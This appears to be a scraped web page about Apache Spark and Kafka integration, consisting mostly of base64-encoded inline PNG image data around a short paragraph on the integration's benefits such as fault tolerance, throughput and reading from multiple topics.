GnJ27n8Kuxz+d1Q6/Z2YSBlt7XLLK5KOu/dZbAiVQAiXwPATqAHiesW5PS6AESqAEziRgJtYM77pMe0vANe4nYr8cLuNA+Od3Jny9ROCEaiiBEiiBEiiBtyRQB8Bb0q3tEiiBEiiBXROII8AMbZwBcya7ovcy0fusvFwz2V5E/+//1st/megv/e/69tDGl0AJlMAuCdQBsMtha6NLoARKoATek4CZWc6A//cv/vzlR9oc+6pA9+Vw7nXgWsk1lJn+7N/zWm5dJVACJVACz02gDoDnHv/2vgRKoARK4EYEIua6/8ky9nL46XJ+LMLjRpdbzZRACZRACZTAVQTqALgKWwuVQAmUQAmUQAmUQAmUQAmUQAmUwL4I1AGwr/Fqa0ugBEqgBEqgBEqgBEqgBEqgBErgKgJ1AFyFrYVKoARKoARKoARKoARKoARKoARKYF8E6gDY13i1tSVQAiVQAiVQAiVQAiVQAiVQAiVwFYE6AK7C1kIlUAIlUAIlUAIlUAIlUAIlUAIlsC8CdQDsa7za2hIogRIogRIogRIogRIogRIogRK4ikAdAFdha6ESKIESKIESKIESKIESKIESKIES2BeBOgD2NV5tbQmUQAmUQAmUQAmUQAmUQAmUQAlcRaAOgKuwtVAJlEAJlEAJlEAJlEAJlEAJlEAJ7ItAHQD7Gq+2tgRKoARKoARKoARKoARKoARKoASuIlAHwFXYWqgESqAESqAESqAESqAESqAESqAE9kWgDoB9jVdbWwIlUAIlUAIlUAIlUAIlUAIlUAJXEagD4CpsLVQCJVACJVACJVACJVACJVACJVAC+yJQB8C+xqutLYESKIESKIESKIESKIESKIESKIGrCNQBcBW2FiqBEiiBEiiBEiiBEiiBEiiBEiiBfRGoA2Bf49XWlkAJlEAJlEAJlEAJlEAJlEAJlMBVBOoAuApbC5VACZRACZRACZRACZRACZRACZTAvgjUAbCv8WprS6AESqAESqAESqAESqAESqAESuAqAnUAXIWthUqgBEqgBEqgBEqgBEqgBEqgBEpgXwTqANjXeLW1JVACJVACJVACJVACJVACJVACJXAVgToArsLWQiVQAiVQAiVQAiVQAiVQAiVQAiWwLwJ1AOxrvNraEiiBEiiBEiiBEiiBEiiBEiiBEriKQB0AV2FroRIogRIogRIogRIogRIogRIogRLYF4E6APY1Xm1tCZRACZRACZRACZRACZRACZRACVxFoA6Aq7C1UAmUQAmUQAmUQAmUQAmUQAmUQAnsi0AdAPsar7a2BEqgBEqgBEqgBEqgBEqgBEqgBK4iUAfAVdhaqARKoARKoARKoARKoARKoARKoAT2RaAOgH2NV1tbAiVQAiVQAiVQAiVQAiVQAiVQAlcRqAPgKmwtVAIlUAIlUAIlUAIlUAIlUAIlUAL7IlAHwL7Gq60tgRIogRIogRIogRIogRIogRIogasI1AFwFbYWKoESKIESKIESKIESKIESKIESKIF9EagDYF/j1daWQAmUQAmUQAmUQAmUQAmUQAmUwFUE6gC4ClsLlUAJlEAJlEAJlEAJlEAJlEAJlMC+CNQBsK/xamtLoARKoARKoARKoARKoARKoARK4CoCdQBcha2FSqAESqAESqAESqAESqAESqAESmBfBOoA2Nd4tbUlUAIlUAIlUAIlUAIlUAIlUAIlcBWBOgCuwtZCJVACJVACJVACJVACJVACJVACJbAvAnUA7Gu82toSKIESKIESKIESKIESKIESKIESuIpAHQBXYWuhEiiBEiiBEiiBEiiBEiiBEiiBEtgXgToA9jVebW0JlEAJlEAJlEAJlEAJlEAJlEAJXEWgDoCrsLVQCZRACZRACZRACZRACZRACZRACeyLQB0A+xqvtrYESqAESqAESqAESqAESqAESqAEriJQB8BV2FqoBEqgBEqgBEqgBEqgBEqgBEqgBPZFoA6AfY1XW1sCJVACJVACJVACJVACJVACJVACVxGoA+AqbC1UAiVQAiVQAiVQAiVQAiVQAiVQAvsiUAfAvsarrS2BEiiBEiiBEiiBEiiBEiiBEiiBqwjUAXAVthYqgRIogRIogRIogRIogRIogRIogX0RqANgX+PV1pZACZRACZRACZRACZRACZRACZTAVQT+f5OIu99za+LeAAAAAElFTkSuQmCC) There are several benefits of implementing Spark-Kafka integration. You can ensure minimum data loss through Spark Streaming while saving all the received Kafka data synchronously for an easy recovery. Users can read messages from a single topic or multiple Kafka topics. Along with this level of flexibility you can also access high scalability, throughput and fault-tolerance and a range of other benefits by using Spark and Kafka in tandem. 
This integration can be understood with a data pipeline that functions in the methodology shown below: ![image.png](data:image/png;base64,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